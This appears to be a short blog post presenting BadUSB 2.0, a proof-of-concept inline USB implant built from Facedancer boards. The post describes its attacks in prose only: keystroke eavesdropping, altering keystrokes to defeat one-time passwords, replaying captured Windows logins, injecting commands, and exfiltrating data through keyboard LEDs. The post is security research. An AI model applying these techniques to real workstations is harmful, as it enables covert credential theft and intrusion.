Sunday, November 5, 2017

BADUSB 2.0 USB MITM POC. BadUSB2 is an INLINE hardware implant giving it the stealth of a hardware keylogger but far more capabilities as mentioned above

HARDWARE NEEDED:
x1 Linux build (tested on default install of Ubuntu 14.04)
x1 Windows XP/7 (our target)
x2 Facedancers
x3 USB type A-male to USB Mini-B cables
x1 USB Keyboard (tested on HP & Genius brands)
Implemented Proof of Concept Attacks:
+ Eavesdrop. Once the keyboard has been registered to the target all keystrokes are captured to the ‘/tmp’ folder.
+ Modify. Weaponised code could use regular expressions to modify user keystrokes in order to defeat one-time-passwords. In this POC we simply annoy the user 🙂
+ Replay. The POC code will automatically detect ‘ctrl-alt-delete’ and assume it is a login session. It stops recording once the ‘enter’ key is pressed. Ay any time the ‘replay’ command can be given to automatically authenticate to the workstation.
+ Fabricate. Start/Run or generic commands can be issued to the target operating-system just as if you were at the keyboard.
+ Exfiltrate. I’ve implemented a PowerShell exfiltration POC that uses the ‘morse code’ technique (LEDs) to exfiltrate data. Using custom HID output reports is faster but MS Windows restricts read/write access from Win 2K. In short, this is a very rudimentary POC, and did I mention very slow!
BadUSB. I did not actually implement a POC for this. The Facedancer has plenty of example code that can be used to fake USB peripherals to the host, but it would be nice to implement some of the BadUSB “Kali Nethunter” type attacks here.
Usage:

No comments:

Man in the Rain